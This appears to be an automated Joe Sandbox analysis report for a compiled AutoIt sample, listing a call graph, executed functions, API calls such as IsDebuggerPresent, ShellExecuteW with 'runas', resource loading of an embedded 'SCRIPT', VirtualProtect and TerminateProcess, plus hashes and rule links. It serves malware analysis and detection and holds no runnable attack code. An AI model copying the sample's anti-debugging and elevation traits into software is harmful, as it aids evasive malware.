103190->103191 103192 517667 59 API calls 103191->103192 103193 52611d 103192->103193 103194 517667 59 API calls 103193->103194 103195 526128 103194->103195 103196 517667 59 API calls 103195->103196 103197 526133 103196->103197 103198 525a9d 59 API calls 103197->103198 103199 52613e 103198->103199 103200 530db6 Mailbox 59 API calls 103199->103200 103201 526145 RegisterWindowMessageW 103200->103201 103201->103151 103204 56576f 103203->103204 103205 52fdae 103203->103205 103222 579ae7 60 API calls 103204->103222 103206 530db6 Mailbox 59 API calls 103205->103206 103208 52fdb6 103206->103208 103208->103155 103209 56577a 103210->103162 103211->103164 103223 5771ed 65 API calls 103211->103223 103213 517667 59 API calls 103212->103213 103214 52ffe7 103213->103214 103215 517667 59 API calls 103214->103215 103216 52ffef 103215->103216 103217 517667 59 API calls 103216->103217 103218 52ff3b 103217->103218 103218->103168 103220 517667 59 API calls 103219->103220 103221 525aa5 103220->103221 103221->103182 103222->103209 103224 511016 103229 514974 103224->103229 103227 532d40 __cinit 67 API calls 103228 511025 103227->103228 103230 530db6 Mailbox 59 API calls 103229->103230 103231 51497c 103230->103231 103232 51101b 103231->103232 103236 514936 103231->103236 103232->103227 103237 514951 103236->103237 103238 51493f 103236->103238 103240 5149a0 103237->103240 103239 532d40 __cinit 67 API calls 103238->103239 103239->103237 103241 517667 59 API calls 103240->103241 103242 5149b8 GetVersionExW 103241->103242 103243 517bcc 59 API calls 103242->103243 103244 5149fb 103243->103244 103245 517d2c 59 API calls 103244->103245 103248 514a28 103244->103248 103246 514a1c 103245->103246 103247 517726 59 API calls 103246->103247 103247->103248 103249 514a93 GetCurrentProcess IsWow64Process 103248->103249 103251 54d864 103248->103251 103250 514aac 103249->103250 103252 514ac2 103250->103252 103253 514b2b GetSystemInfo 103250->103253 103264 514b37 103252->103264 103254 514af8 103253->103254 103254->103232 103257 514ad4 103260 514b37 2 API calls 103257->103260 103258 514b1f GetSystemInfo 103259 514ae9 103258->103259 103259->103254 103261 514aef FreeLibrary 103259->103261 103262 514adc GetNativeSystemInfo 103260->103262 103261->103254 103262->103259 103265 514ad0 103264->103265 103266 514b40 LoadLibraryA 103264->103266 103265->103257 103265->103258 103266->103265 103267 514b51 GetProcAddress 103266->103267 103267->103265 103268 51be19 103269 51baab 103268->103269 103270 51be22 103268->103270 103270->103269 103271 519837 84 API calls 103270->103271 103279 51ba8b Mailbox 103270->103279 103272 51be4d 103271->103272 103273 51be5d 103272->103273 103274 55107b 103272->103274 103275 517a51 59 API calls 103273->103275 103283 567bdb 59 API calls _memmove 103274->103283 103275->103279 103277 551085 103278 518047 59 API calls 103277->103278 103278->103279 103279->103269 103281 551361 103279->103281 103285 518cd4 59 API calls Mailbox 103279->103285 103281->103269 103284 533d46 59 API calls __wtof_l 103281->103284 103283->103277 103284->103269 103285->103279 103286 54fdfc 103291 51ab30 Mailbox _memmove 103286->103291 103288 56617e Mailbox 59 API calls 103312 51a057 103288->103312 103289 519c90 Mailbox 59 API calls 103289->103291 103290 530db6 59 API calls Mailbox 103290->103291 103291->103289 103291->103290 103292 51b525 103291->103292 103291->103312 103313 517de1 59 API calls 103291->103313 103316 519f37 Mailbox 103291->103316 103317 58bc6b 331 API calls 103291->103317 103320 51b2b6 103291->103320 103321 519ea0 331 API calls 103291->103321 103323 55086a 103291->103323 103325 550878 103291->103325 103327 55085c 103291->103327 103328 51b21c 103291->103328 103332 566e8f 59 API calls 103291->103332 103335 58df23 103291->103335 103338 58df37 103291->103338 103341 58c2e0 103291->103341 103373 577956 103291->103373 103379 56617e 103291->103379 103384 58c193 85 API calls 2 library calls 103291->103384 103386 579e4a 89 API calls 4 library calls 103292->103386 103295 530db6 59 API calls Mailbox 103295->103316 103296 5509e5 103390 579e4a 89 API calls 4 library calls 103296->103390 103297 550055 103385 579e4a 89 API calls 4 library calls 103297->103385 103298 51b900 60 API calls 103298->103316 103301 51b475 103306 518047 59 API calls 103301->103306 103302 518047 59 API calls 103302->103316 103303 550064 103304 51b47a 103304->103296 103304->103297 103306->103312 103309 566e8f 59 API calls 103309->103316 103310 517667 59 API calls 103310->103316 103311 532d40 67 API calls __cinit 103311->103316 103313->103291 103314 5509d6 103389 579e4a 89 API calls 4 library calls 103314->103389 103316->103295 103316->103297 103316->103298 103316->103301 103316->103302 103316->103304 103316->103309 103316->103310 103316->103311 103316->103312 103316->103314 103318 51a55a 103316->103318 103382 51c8c0 331 API calls 2 library calls 103316->103382 103317->103291 103388 579e4a 89 API calls 4 library calls 103318->103388 103383 51f6a3 331 API calls 103320->103383 103321->103291 103324 519c90 Mailbox 59 API calls 103323->103324 103324->103327 103387 579e4a 89 API calls 4 library calls 103325->103387 103327->103288 103327->103312 103329 519d3c 60 API calls 103328->103329 103330 51b22d 103329->103330 103331 519d3c 60 API calls 103330->103331 103331->103320 103332->103291 103391 58cadd 103335->103391 103337 58df33 103337->103291 103339 58cadd 130 API calls 103338->103339 103340 58df47 103339->103340 103340->103291 103342 517667 59 API calls 103341->103342 103343 58c2f4 103342->103343 103344 517667 59 API calls 103343->103344 103345 58c2fc 103344->103345 103346 517667 59 API calls 103345->103346 103347 58c304 103346->103347 103348 519837 84 API calls 103347->103348 103362 58c312 103348->103362 103349 517bcc 59 API calls 103349->103362 103350 517924 59 API calls 103350->103362 103351 58c4fb 103352 58c528 Mailbox 103351->103352 103482 519a3c 59 API calls Mailbox 103351->103482 103352->103291 103353 58c4e2 103357 517cab 59 API calls 103353->103357 103355 58c4fd 103359 517cab 59 API calls 103355->103359 103356 518047 59 API calls 103356->103362 103358 58c4ef 103357->103358 103360 517b2e 59 API calls 103358->103360 103361 58c50c 103359->103361 103360->103351 103364 517b2e 59 API calls 103361->103364 103362->103349 103362->103350 103362->103351 103362->103352 103362->103353 103362->103355 103362->103356 103363 517e4f 59 API calls 103362->103363 103365 517e4f 59 API calls 103362->103365 103370 519837 84 API calls 103362->103370 103371 517cab 59 API calls 103362->103371 103372 517b2e 59 API calls 103362->103372 103366 58c3a9 CharUpperBuffW 103363->103366 103364->103351 103367 58c469 CharUpperBuffW 103365->103367 103480 51843a 68 API calls 103366->103480 103481 51c5a7 69 API calls 2 library calls 103367->103481 103370->103362 103371->103362 103372->103362 103374 577962 103373->103374 103375 530db6 Mailbox 59 API calls 103374->103375 103376 577970 103375->103376 103377 57797e 103376->103377 103378 517667 59 API calls 103376->103378 103377->103291 103378->103377 103483 5660c0 103379->103483 103381 56618c 103381->103291 103382->103316 103383->103292 103384->103291 103385->103303 103386->103327 103387->103327 103388->103312 103389->103296 103390->103312 103392 519837 84 API calls 103391->103392 103393 58cb1a 103392->103393 103418 58cb61 Mailbox 103393->103418 103429 58d7a5 103393->103429 103395 58cdb9 103396 58cf2e 103395->103396 103400 58cdc7 103395->103400 103467 58d8c8 92 API calls Mailbox 103396->103467 103399 58cf3d 103399->103400 103401 58cf49 103399->103401 103442 58c96e 103400->103442 103401->103418 103402 519837 84 API calls 103412 58cbb2 Mailbox 103402->103412 103407 58ce00 103457 530c08 103407->103457 103410 58ce1a 103463 579e4a 89 API calls 4 library calls 103410->103463 103411 58ce33 103414 5192ce 59 API calls 103411->103414 103412->103395 103412->103402 103412->103418 103461 58fbce 59 API calls 2 library calls 103412->103461 103462 58cfdf 61 API calls 2 library calls 103412->103462 103416 58ce3f 103414->103416 103415 58ce25 GetCurrentProcess TerminateProcess 103415->103411 103417 519050 59 API calls 103416->103417 103419 58ce55 103417->103419 103418->103337 103428 58ce7c 103419->103428 103464 518d40 59 API calls Mailbox 103419->103464 103421 58cfa4 103421->103418 103424 58cfb8 FreeLibrary 103421->103424 103422 58ce6b 103465 58d649 107 API calls _free 103422->103465 103424->103418 103427 519d3c 60 API calls 103427->103428 103428->103421 103428->103427 103466 518d40 59 API calls Mailbox 103428->103466 103468 58d649 107 API calls _free 103428->103468 103430 517e4f 59 API calls 103429->103430 103431 58d7c0 CharLowerBuffW 103430->103431 103469 56f167 103431->103469 103435 517667 59 API calls 103436 58d7f9 103435->103436 103437 51784b 59 API calls 103436->103437 103438 58d810 103437->103438 103439 517d2c 59 API calls 103438->103439 103440 58d81c Mailbox 103439->103440 103441 58d858 Mailbox 103440->103441 103476 58cfdf 61 API calls 2 library calls 103440->103476 103441->103412 103443 58c989 103442->103443 103447 58c9de 103442->103447 103444 530db6 Mailbox 59 API calls 103443->103444 103445 58c9ab 103444->103445 103446 530db6 Mailbox 59 API calls 103445->103446 103445->103447 103446->103445 103448 58da50 103447->103448 103449 58dc79 Mailbox 103448->103449 103456 58da73 _strcat _wcscpy __NMSG_WRITE 103448->103456 103449->103407 103450 519b98 59 API calls 103450->103456 103451 519b3c 59 API calls 103451->103456 103452 519be6 59 API calls 103452->103456 103453 519837 84 API calls 103453->103456 103454 53571c 58 API calls __crtCompareStringA_stat 103454->103456 103456->103449 103456->103450 103456->103451 103456->103452 103456->103453 103456->103454 103479 575887 61 API calls 2 library calls 103456->103479 103459 530c1d 103457->103459 103458 530cb5 VirtualProtect 103460 530c83 103458->103460 103459->103458 103459->103460 103460->103410 103460->103411 103461->103412 103462->103412 103463->103415 103464->103422 103465->103428 103466->103428 103467->103399 103468->103428 103470 56f192 __NMSG_WRITE 103469->103470 103471 56f1d1 103470->103471 103473 56f1c7 103470->103473 103475 56f278 103470->103475 103471->103435 103471->103440 103473->103471 103477 5178c4 61 API calls 103473->103477 103475->103471 103478 5178c4 61 API calls 103475->103478 103476->103441 103477->103473 103478->103475 103479->103456 103480->103362 103481->103362 103482->103352 103484 5660cb 103483->103484 103485 5660e8 103483->103485 103484->103485 103487 5660ab 59 API calls Mailbox 103484->103487 103485->103381 103487->103484 103488 55416f 103492 565fe6 103488->103492 103490 55417a 103491 565fe6 85 API calls 103490->103491 103491->103490 103493 565ff3 103492->103493 103502 566020 103492->103502 103494 566022 103493->103494 103495 566027 103493->103495 103500 56601a 103493->103500 103493->103502 103504 519328 84 API calls Mailbox 103494->103504 103497 519837 84 API calls 103495->103497 103498 56602e 103497->103498 103499 517b2e 59 API calls 103498->103499 103499->103502 103503 5195a0 59 API calls _wcsstr 103500->103503 103502->103490 103503->103502 103504->103495 103505 1036378 103506 1033fc8 GetPEB 103505->103506 103507 1036422 103506->103507 103519 1036268 103507->103519 103520 1036271 Sleep 103519->103520 103521 103627f 103520->103521 103522 51107d 103527 51708b 103522->103527 103524 51108c 103525 532d40 __cinit 67 API calls 103524->103525 103526 511096 103525->103526 103528 51709b __write_nolock 103527->103528 103529 517667 59 API calls 103528->103529 103530 517151 103529->103530 103531 514706 61 API calls 103530->103531 103532 51715a 103531->103532 103558 53050b 103532->103558 103535 517cab 59 API calls 103536 517173 103535->103536 103537 513f74 59 API calls 103536->103537 103538 517182 103537->103538 103539 517667 59 API calls 103538->103539 103540 51718b 103539->103540 103541 517d8c 59 API calls 103540->103541 103542 517194 RegOpenKeyExW 103541->103542 103543 54e8b1 RegQueryValueExW 103542->103543 103548 5171b6 Mailbox 103542->103548 103544 54e943 RegCloseKey 103543->103544 103545 54e8ce 103543->103545 103544->103548 103551 54e955 _wcscat Mailbox __NMSG_WRITE 103544->103551 103546 530db6 Mailbox 59 API calls 103545->103546 103547 54e8e7 103546->103547 103550 51522e 59 API calls 103547->103550 103548->103524 103549 5179f2 59 API calls 103549->103551 103552 54e8f2 RegQueryValueExW 103550->103552 103551->103548 103551->103549 103556 517de1 59 API calls 103551->103556 103557 513f74 59 API calls 103551->103557 103553 54e90f 103552->103553 103555 54e929 103552->103555 103554 517bcc 59 API calls 103553->103554 103554->103555 103555->103544 103556->103551 103557->103551 103559 541940 __write_nolock 103558->103559 103560 530518 GetFullPathNameW 103559->103560 103561 53053a 103560->103561 103562 517bcc 59 API calls 103561->103562 103563 517165 103562->103563 103563->103535

                                                                      Executed Functions

                                                                      Function 00513B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00513B68
                                                                      • IsDebuggerPresent.KERNEL32 ref: 00513B7A
                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,005D52F8,005D52E0,?,?), ref: 00513BEB
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                        • Part of subcall function 0052092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00513C14,005D52F8,?,?,?), ref: 0052096E
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00513C6F
                                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,005C7770,00000010), ref: 0054D281
                                                                      • SetCurrentDirectoryW.KERNEL32(?,005D52F8,?,?,?), ref: 0054D2B9
                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,005C4260,005D52F8,?,?,?), ref: 0054D33F
                                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 0054D346
                                                                        • Part of subcall function 00513A46: GetSysColorBrush.USER32(0000000F), ref: 00513A50
                                                                        • Part of subcall function 00513A46: LoadCursorW.USER32(00000000,00007F00), ref: 00513A5F
                                                                        • Part of subcall function 00513A46: LoadIconW.USER32(00000063), ref: 00513A76
                                                                        • Part of subcall function 00513A46: LoadIconW.USER32(000000A4), ref: 00513A88
                                                                        • Part of subcall function 00513A46: LoadIconW.USER32(000000A2), ref: 00513A9A
                                                                        • Part of subcall function 00513A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00513AC0
                                                                        • Part of subcall function 00513A46: RegisterClassExW.USER32(?), ref: 00513B16
                                                                        • Part of subcall function 005139D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00513A03
                                                                        • Part of subcall function 005139D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00513A24
                                                                        • Part of subcall function 005139D5: ShowWindow.USER32(00000000,?,?), ref: 00513A38
                                                                        • Part of subcall function 005139D5: ShowWindow.USER32(00000000,?,?), ref: 00513A41
                                                                        • Part of subcall function 0051434A: _memset.LIBCMT ref: 00514370
                                                                        • Part of subcall function 0051434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00514415
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                      • String ID: This is a third-party compiled AutoIt script.$runas$%Z
                                                                      • API String ID: 529118366-603944991
                                                                      • Opcode ID: 3cd6f1de363f4f8dfb1c99d1480fab72eb80a655b8a6d70883ba7ea679ebfc68
                                                                      • Instruction ID: edcd86ef0a66e38516a104239564e5d8ff904f3f85a8373d70d4c6100d4c6800
                                                                      • Opcode Fuzzy Hash: 3cd6f1de363f4f8dfb1c99d1480fab72eb80a655b8a6d70883ba7ea679ebfc68
                                                                      • Instruction Fuzzy Hash: D651077890910DEEEF21EBB8DC19EED7F74BF98304F004067F411A2291EA704A89DB61
                                                                      Function 005149A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1037 5149a0-514a00 call 517667 GetVersionExW call 517bcc 1042 514a06 1037->1042 1043 514b0b-514b0d 1037->1043 1045 514a09-514a0e 1042->1045 1044 54d767-54d773 1043->1044 1046 54d774-54d778 1044->1046 1047 514b12-514b13 1045->1047 1048 514a14 1045->1048 1050 54d77a 1046->1050 1051 54d77b-54d787 1046->1051 1049 514a15-514a4c call 517d2c call 517726 1047->1049 1048->1049 1059 54d864-54d867 1049->1059 1060 514a52-514a53 1049->1060 1050->1051 1051->1046 1053 54d789-54d78e 1051->1053 1053->1045 1055 54d794-54d79b 1053->1055 1055->1044 1057 54d79d 1055->1057 1061 54d7a2-54d7a5 1057->1061 1062 54d880-54d884 1059->1062 1063 54d869 1059->1063 1060->1061 1064 514a59-514a64 1060->1064 1065 514a93-514aaa GetCurrentProcess IsWow64Process 1061->1065 1066 54d7ab-54d7c9 1061->1066 1071 54d886-54d88f 1062->1071 1072 54d86f-54d878 1062->1072 1067 54d86c 1063->1067 1068 514a6a-514a6c 1064->1068 1069 54d7ea-54d7f0 1064->1069 1073 514aac 1065->1073 1074 514aaf-514ac0 1065->1074 1066->1065 1070 54d7cf-54d7d5 1066->1070 1067->1072 1075 54d805-54d811 1068->1075 1076 514a72-514a75 1068->1076 1079 54d7f2-54d7f5 1069->1079 1080 54d7fa-54d800 1069->1080 1077 54d7d7-54d7da 1070->1077 1078 54d7df-54d7e5 1070->1078 1071->1067 1081 54d891-54d894 1071->1081 1072->1062 1073->1074 1082 514ac2-514ad2 call 514b37 1074->1082 1083 514b2b-514b35 GetSystemInfo 1074->1083 1087 54d813-54d816 1075->1087 1088 54d81b-54d821 1075->1088 1084 54d831-54d834 1076->1084 1085 514a7b-514a8a 1076->1085 1077->1065 1078->1065 1079->1065 1080->1065 1081->1072 1094 514ad4-514ae1 call 514b37 1082->1094 1095 514b1f-514b29 GetSystemInfo 1082->1095 1086 514af8-514b08 1083->1086 1084->1065 1093 54d83a-54d84f 1084->1093 1090 514a90 1085->1090 1091 54d826-54d82c 1085->1091 1087->1065 1088->1065 1090->1065 1091->1065 1096 54d851-54d854 1093->1096 1097 54d859-54d85f 1093->1097 1102 514ae3-514ae7 GetNativeSystemInfo 1094->1102 1103 514b18-514b1d 1094->1103 1098 514ae9-514aed 1095->1098 1096->1065 1097->1065 1098->1086 1100 514aef-514af2 FreeLibrary 1098->1100 1100->1086 1102->1098 1103->1102
                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 005149CD
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      • GetCurrentProcess.KERNEL32(?,0059FAEC,00000000,00000000,?), ref: 00514A9A
                                                                      • IsWow64Process.KERNEL32(00000000), ref: 00514AA1
                                                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00514AE7
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00514AF2
                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00514B23
                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00514B2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                      • String ID:
                                                                      • API String ID: 1986165174-0
                                                                      • Opcode ID: d83bbb5306b2a3bc83f56a5f430fd559938f09ecaf21129dcb152704458d48b6
                                                                      • Instruction ID: c5550571feb6f3d9ce37d8812680851f41edab3875dd1273f8816164471b4819
                                                                      • Opcode Fuzzy Hash: d83bbb5306b2a3bc83f56a5f430fd559938f09ecaf21129dcb152704458d48b6
                                                                      • Instruction Fuzzy Hash: AE91B33198D7C1DADB31CB6894505EEBFF5BF2A300F485DAED0C693A41D220A588DB69
                                                                      Function 00514E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1104 514e89-514ea1 CreateStreamOnHGlobal 1105 514ec1-514ec6 1104->1105 1106 514ea3-514eba FindResourceExW 1104->1106 1107 514ec0 1106->1107 1108 54d933-54d942 LoadResource 1106->1108 1107->1105 1108->1107 1109 54d948-54d956 SizeofResource 1108->1109 1109->1107 1110 54d95c-54d967 LockResource 1109->1110 1110->1107 1111 54d96d-54d975 1110->1111 1112 54d979-54d98b 1111->1112 1112->1107
                                                                      APIs
                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00514D8E,?,?,00000000,00000000), ref: 00514E99
                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00514D8E,?,?,00000000,00000000), ref: 00514EB0
                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00514D8E,?,?,00000000,00000000,?,?,?,?,?,?,00514E2F), ref: 0054D937
                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00514D8E,?,?,00000000,00000000,?,?,?,?,?,?,00514E2F), ref: 0054D94C
                                                                      • LockResource.KERNEL32(00514D8E,?,?,00514D8E,?,?,00000000,00000000,?,?,?,?,?,?,00514E2F,00000000), ref: 0054D95F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                      • String ID: SCRIPT
                                                                      • API String ID: 3051347437-3967369404
                                                                      • Opcode ID: ea5c9a029c28fa9f439ab21336a46b77057fb555689f436f546a18645612e395
                                                                      • Instruction ID: 3f885bba93ea52bf37e09f21e1c52f4b164c70ae6cdc6490ebc01fe74d626a86
                                                                      • Opcode Fuzzy Hash: ea5c9a029c28fa9f439ab21336a46b77057fb555689f436f546a18645612e395
                                                                      • Instruction Fuzzy Hash: 46115AB5240700BFEB218B65EC48FA77FBEFBC5B11F204669F406C6250DB61E8449A61
                                                                      Function 0051FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper
                                                                      • String ID: pb]$%Z
                                                                      • API String ID: 3964851224-453358694
                                                                      • Opcode ID: b222622b243d86feb87b48104ff0758427cf33a59327ff23a89997cf8168c79e
                                                                      • Instruction ID: a5af165523a57f4695e26d897666ecf1ffca7d3a2d97970498da801a5e636dbc
                                                                      • Opcode Fuzzy Hash: b222622b243d86feb87b48104ff0758427cf33a59327ff23a89997cf8168c79e
                                                                      • Instruction Fuzzy Hash: 95928C746083518FD720DF14D494B6ABFE5BF86304F14892DE88A8B3A2D771EC85CB92
                                                                      Function 0051E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Dd]$Dd]$Dd]$Dd]$Variable must be of type 'Object'.
                                                                      • API String ID: 0-869367157
                                                                      • Opcode ID: dc559dba0e230fdd8027890ab83f40935ca32c808f714b81e12ef75bfcd9982e
                                                                      • Instruction ID: 3df76f7611d7c981747968d6f2e83408d442d3278b33477f7e621ba675063ead
                                                                      • Opcode Fuzzy Hash: dc559dba0e230fdd8027890ab83f40935ca32c808f714b81e12ef75bfcd9982e
                                                                      • Instruction Fuzzy Hash: 3BA28D74A00206CFEB24CF58C496AEABBB5FF59314F24845AEC05AB351D735ED86CB90
                                                                      Function 0057445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,0054E398), ref: 0057446A
                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 0057447B
                                                                      • FindClose.KERNEL32(00000000), ref: 0057448B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                      • String ID:
                                                                      • API String ID: 48322524-0
                                                                      • Opcode ID: c8f5e3e56bc32d3d762043cb34b20e2fb7b1a6342fbbb777e3ac417af1c65e51
                                                                      • Instruction ID: 6016d374d92eca1a8a62d004da262b5bccbf03f111898b924ff47e638a480c7c
                                                                      • Opcode Fuzzy Hash: c8f5e3e56bc32d3d762043cb34b20e2fb7b1a6342fbbb777e3ac417af1c65e51
                                                                      • Instruction Fuzzy Hash: 82E0D837410500674A106B38FC0D5ED7B5DAE15335F254B16F83AC10D0E7745904BA95
                                                                      Function 005209D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00520A5B
                                                                      • timeGetTime.WINMM ref: 00520D16
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00520E53
                                                                      • Sleep.KERNEL32(0000000A), ref: 00520E61
                                                                      • LockWindowUpdate.USER32(00000000,?,?), ref: 00520EFA
                                                                      • DestroyWindow.USER32 ref: 00520F06
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00520F20
                                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00554E83
                                                                      • TranslateMessage.USER32(?), ref: 00555C60
                                                                      • DispatchMessageW.USER32(?), ref: 00555C6E
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00555C82
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
